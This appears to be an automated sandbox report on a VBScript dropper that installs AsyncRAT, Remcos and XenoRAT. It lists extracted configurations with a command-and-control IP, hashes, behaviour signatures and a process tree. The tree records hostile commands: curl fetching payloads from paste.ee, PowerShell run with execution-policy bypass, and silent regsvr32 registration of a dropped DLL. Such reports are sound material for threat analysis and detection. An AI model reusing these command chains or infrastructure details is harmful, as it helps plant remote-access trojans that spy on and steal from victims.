Analysis

  • max time kernel
    22s
  • max time network
    31s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-05-2024 08:51

General

  • Target

    lmg_Angeia_Whlt_phto.vbs

  • Size

    451KB

  • MD5

    50dd276ecb219b58afb8dd4c72921930

  • SHA1

    6900dcdd573f4261e32ee98f8e15817ea5b17c94

  • SHA256

    c989926eb17a83e10fa18a7beb6e1a468c88740e157609db9dd7600498f6c148

  • SHA512

    3639ec354ce49229d31fc662c97b50d233203c23571d7cb8b57cd7d42cef62afce629b9237a7e263e9986501a49c6cdaa7597a430f62ffc590830d4354e30f1c

  • SSDEEP

    3072:CLo26YF/VCe4VTdRlTT8w4TWvxqtIgJdpe+og0S7wQzS18f8d6bb/g52D:4o26YF4xq3

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

MATIDOWN2

C2

141.95.84.40:6465

Mutex

wcawcaw

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

remcos

Botnet

xxx1

C2

141.95.84.40:6468

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    registros.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    asasas-3248IW

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Capturas de pantalla

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Extracted

Family

xenorat

C2

141.95.84.40

Mutex

asasaa33d3a143vaavwwv

Attributes
  • delay

    5000

  • install_path

    nothingset

  • port

    6676

  • startup_name

    nothingset

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • XenorRat

    XenorRat is a remote access trojan written in C#.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Loads dropped DLL 9 IoCs
  • Registers COM server for autorun 1 TTPs 14 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Start PowerShell.

  • Suspicious use of SetThreadContext 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Modifies registry class 34 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\lmg_Angeia_Whlt_phto.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2020
    • C:\Windows\System32\curl.exe
      curl -s https://paste.ee/r/uazpL
      2⤵
        PID:5144
      • C:\Windows\SysWOW64\wscript.exe
        "C:\Windows\SysWOW64\wscript.exe" //b //e:vbscript "C:\Users\Admin\AppData\Local\Temp\lmg_Angeia_Whlt_phto.vbs"
        2⤵
        • Checks computer location settings
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1224
        • C:\Windows\SysWOW64\curl.exe
          curl -s https://paste.ee/r/uazpL
          3⤵
            PID:5312
          • C:\Windows\SysWOW64\regsvr32.exe
            "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
            3⤵
            • Loads dropped DLL
            • Registers COM server for autorun
            • Modifies registry class
            PID:5736
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            3⤵
            • Checks computer location settings
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3180
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\RC0S.vbs"' & exit
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4232
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\RC0S.vbs"'
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:5004
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RC0S.vbs"
                  6⤵
                  • Checks computer location settings
                  • Drops startup file
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious use of WriteProcessMemory
                  PID:1124
                  • C:\Windows\SysWOW64\curl.exe
                    curl -s https://paste.ee/r/kIEYz
                    7⤵
                      PID:2804
                    • C:\Windows\SysWOW64\regsvr32.exe
                      "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
                      7⤵
                      • Loads dropped DLL
                      • Registers COM server for autorun
                      • Modifies registry class
                      PID:4632
                    • C:\Windows\winhlp32.exe
                      "C:\Windows\winhlp32.exe"
                      7⤵
                        PID:5948
                      • C:\Windows\SysWOW64\regsvr32.exe
                        "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
                        7⤵
                        • Loads dropped DLL
                        • Registers COM server for autorun
                        • Modifies registry class
                        PID:548
                      • C:\Windows\winhlp32.exe
                        "C:\Windows\winhlp32.exe"
                        7⤵
                          PID:4580
                        • C:\Windows\SysWOW64\regsvr32.exe
                          "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
                          7⤵
                          • Loads dropped DLL
                          • Registers COM server for autorun
                          • Modifies registry class
                          PID:3008
                        • C:\Windows\winhlp32.exe
                          "C:\Windows\winhlp32.exe"
                          7⤵
                            PID:3972
                          • C:\Windows\SysWOW64\regsvr32.exe
                            "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
                            7⤵
                            • Loads dropped DLL
                            • Registers COM server for autorun
                            • Modifies registry class
                            PID:5768
                          • C:\Windows\winhlp32.exe
                            "C:\Windows\winhlp32.exe"
                            7⤵
                              PID:1956
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\h.vbs"' & exit
                        4⤵
                          PID:60
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\h.vbs"'
                            5⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Modifies registry class
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2648
                            • C:\Windows\SysWOW64\WScript.exe
                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\h.vbs"
                              6⤵
                              • Drops startup file
                              PID:1120
                              • C:\Windows\SysWOW64\curl.exe
                                curl -s https://paste.ee/r/6Y0DE
                                7⤵
                                  PID:2836
                                • C:\Windows\SysWOW64\regsvr32.exe
                                  "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
                                  7⤵
                                    PID:2328
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                    7⤵
                                      PID:4072
                                    • C:\Windows\SysWOW64\regsvr32.exe
                                      "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
                                      7⤵
                                        PID:4472
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                        7⤵
                                          PID:4616
                                        • C:\Windows\SysWOW64\regsvr32.exe
                                          "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
                                          7⤵
                                            PID:1388
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                            7⤵
                                              PID:4376
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4376 -s 80
                                                8⤵
                                                • Program crash
                                                PID:4280
                                            • C:\Windows\SysWOW64\regsvr32.exe
                                              "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
                                              7⤵
                                                PID:4992
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                7⤵
                                                  PID:4892
                                        • C:\Windows\SysWOW64\regsvr32.exe
                                          "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
                                          3⤵
                                          • Loads dropped DLL
                                          • Registers COM server for autorun
                                          • Modifies registry class
                                          PID:5132
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                          3⤵
                                            PID:8
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 80
                                              4⤵
                                              • Program crash
                                              PID:2300
                                          • C:\Windows\SysWOW64\regsvr32.exe
                                            "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
                                            3⤵
                                            • Loads dropped DLL
                                            • Registers COM server for autorun
                                            • Modifies registry class
                                            PID:3288
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                            3⤵
                                              PID:5248
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 8 -ip 8
                                          1⤵
                                            PID:5436
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 4376 -ip 4376
                                            1⤵
                                              PID:1300

                                            Network

                                            MITRE ATT&CK Enterprise v15

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

                                              Filesize

                                              425B

                                              MD5

                                              4eaca4566b22b01cd3bc115b9b0b2196

                                              SHA1

                                              e743e0792c19f71740416e7b3c061d9f1336bf94

                                              SHA256

                                              34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

                                              SHA512

                                              bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                              Filesize

                                              1KB

                                              MD5

                                              5315900105942deb090a358a315b06fe

                                              SHA1

                                              22fe5d2e1617c31afbafb91c117508d41ef0ce44

                                              SHA256

                                              e8bd7d8d1d0437c71aceb032f9fb08dd1147f41c048540254971cc60e95d6cd7

                                              SHA512

                                              77e8d15b8c34a1cb01dbee7147987e2cc25c747e0f80d254714a93937a6d2fe08cb5a772cf85ceb8fec56415bfa853234a003173718c4229ba8cfcf2ce6335a6

                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Filesize

                                              15KB

                                              MD5

                                              22071a7db358ebd269c9e90cc517e969

                                              SHA1

                                              639a145618e68e5c194105b7ffa2ec160d56dd26

                                              SHA256

                                              c6d5f46635231a42f4fe7fc91f56ae15c027730fdbbfb7698abc28aef1910d80

                                              SHA512

                                              b7db92707e5c6a19187237aab557a1bf5be582990e45023826f8bfb6674f865641803d3fec8f9842c03ebf7737dbf236e30c33057f455e99da656268a595f629

                                            • C:\Users\Admin\AppData\Local\Temp\RC0S.vbs

                                              Filesize

                                              451KB

                                              MD5

                                              1f1b5ec1770db718a316090a8b98db7f

                                              SHA1

                                              ad60d1d1871fe7ef7049741d78915f4f8f28962a

                                              SHA256

                                              e6659f8c95c9b063bb58c753e9a8a30c487033b74ca419d59c4b1f29a0725942

                                              SHA512

                                              05e2d6aa6705759a5beae8e3152e630f5e48e2bf93b650837c0b6b2ed1fa1cf1b52c27ed9feaa9331b0f76e246c2f9c9e8d3c68bb72e9be7e4cbea848d39bfef

                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nfnzw0u2.hnm.ps1

                                              Filesize

                                              60B

                                              MD5

                                              d17fe0a3f47be24a6453e9ef58c94641

                                              SHA1

                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                              SHA256

                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                              SHA512

                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                            • C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll

                                              Filesize

                                              13KB

                                              MD5

                                              e0b8dfd17b8e7de760b273d18e58b142

                                              SHA1

                                              801509fb6783c9e57edc67a72dde3c62080ffbaf

                                              SHA256

                                              4ef3a6703abc6b2b8e2cac3031c1e5b86fe8b377fde92737349ee52bd2604379

                                              SHA512

                                              443359da27b3c87e81ae4f4b9a2ab7e7bf6abfa93551fc62347a0b79b36d79635131abc14d4deddab3ace12fdf973496518f67e1be8dc4903b35fd465835556b

                                            • C:\Users\Admin\AppData\Local\Temp\h.vbs

                                              Filesize

                                              451KB

                                              MD5

                                              34d44a86cf9ddf4e53e6a0aa64a4a975

                                              SHA1

                                              d8b0af518dd50d4ebb44d85d640378bd9402c4d6

                                              SHA256

                                              4d078c0882e7b5be255180c58a3893d52ab8cb75fe366c934f2bb779a4f9090a

                                              SHA512

                                              fdfe7aad3688a3e7fa014e40ada5787370bb2e588a6b1af5fe07877e0b45ddb9d0d418310522c26d3bc5450e06f9c0b794fa2d3f7a1bd4302af250af749ca255

                                            • memory/1956-62-0x0000000000400000-0x0000000000482000-memory.dmp

                                              Filesize

                                              520KB

                                            • memory/2648-74-0x0000000005430000-0x0000000005784000-memory.dmp

                                              Filesize

                                              3.3MB

                                            • memory/2648-76-0x0000000005BE0000-0x0000000005C2C000-memory.dmp

                                              Filesize

                                              304KB

                                            • memory/3180-17-0x0000000006A40000-0x0000000006A5E000-memory.dmp

                                              Filesize

                                              120KB

                                            • memory/3180-16-0x0000000006030000-0x000000000603C000-memory.dmp

                                              Filesize

                                              48KB

                                            • memory/3180-15-0x0000000006A70000-0x0000000006AE6000-memory.dmp

                                              Filesize

                                              472KB

                                            • memory/3180-14-0x0000000005B00000-0x0000000005B66000-memory.dmp

                                              Filesize

                                              408KB

                                            • memory/3180-13-0x0000000006040000-0x00000000065E4000-memory.dmp

                                              Filesize

                                              5.6MB

                                            • memory/3180-12-0x00000000059F0000-0x0000000005A8C000-memory.dmp

                                              Filesize

                                              624KB

                                            • memory/3180-4-0x0000000000400000-0x0000000000412000-memory.dmp

                                              Filesize

                                              72KB

                                            • memory/3972-59-0x0000000000400000-0x0000000000482000-memory.dmp

                                              Filesize

                                              520KB

                                            • memory/4072-85-0x0000000000400000-0x0000000000412000-memory.dmp

                                              Filesize

                                              72KB

                                            • memory/4580-56-0x0000000000400000-0x0000000000482000-memory.dmp

                                              Filesize

                                              520KB

                                            • memory/5004-20-0x00000000057F0000-0x0000000005E18000-memory.dmp

                                              Filesize

                                              6.2MB

                                            • memory/5004-32-0x00000000061A0000-0x00000000064F4000-memory.dmp

                                              Filesize

                                              3.3MB

                                            • memory/5004-19-0x0000000005180000-0x00000000051B6000-memory.dmp

                                              Filesize

                                              216KB

                                            • memory/5004-22-0x0000000006050000-0x00000000060B6000-memory.dmp

                                              Filesize

                                              408KB

                                            • memory/5004-21-0x0000000005FA0000-0x0000000005FC2000-memory.dmp

                                              Filesize

                                              136KB

                                            • memory/5004-33-0x0000000006740000-0x000000000675E000-memory.dmp

                                              Filesize

                                              120KB

                                            • memory/5004-34-0x0000000006760000-0x00000000067AC000-memory.dmp

                                              Filesize

                                              304KB

                                            • memory/5004-35-0x0000000007700000-0x0000000007796000-memory.dmp

                                              Filesize

                                              600KB

                                            • memory/5004-36-0x0000000006C20000-0x0000000006C3A000-memory.dmp

                                              Filesize

                                              104KB

                                            • memory/5004-37-0x0000000006C70000-0x0000000006C92000-memory.dmp

                                              Filesize

                                              136KB

                                            • memory/5948-45-0x0000000000400000-0x0000000000482000-memory.dmp

                                              Filesize

                                              520KB

                                            • memory/5948-52-0x0000000000400000-0x0000000000482000-memory.dmp

                                              Filesize

                                              520KB

                                            • memory/5948-50-0x0000000000400000-0x0000000000482000-memory.dmp

                                              Filesize

                                              520KB

                                            • memory/5948-46-0x0000000000400000-0x0000000000482000-memory.dmp

                                              Filesize

                                              520KB

                                            • memory/5948-77-0x0000000000400000-0x0000000000482000-memory.dmp

                                              Filesize

                                              520KB

                                            • memory/5948-78-0x0000000000400000-0x0000000000482000-memory.dmp

                                              Filesize

                                              520KB

                                            • memory/5948-49-0x0000000000400000-0x0000000000482000-memory.dmp

                                              Filesize

                                              520KB

                                            • memory/5948-47-0x0000000000400000-0x0000000000482000-memory.dmp

                                              Filesize

                                              520KB

                                            • memory/5948-48-0x0000000000400000-0x0000000000482000-memory.dmp

                                              Filesize

                                              520KB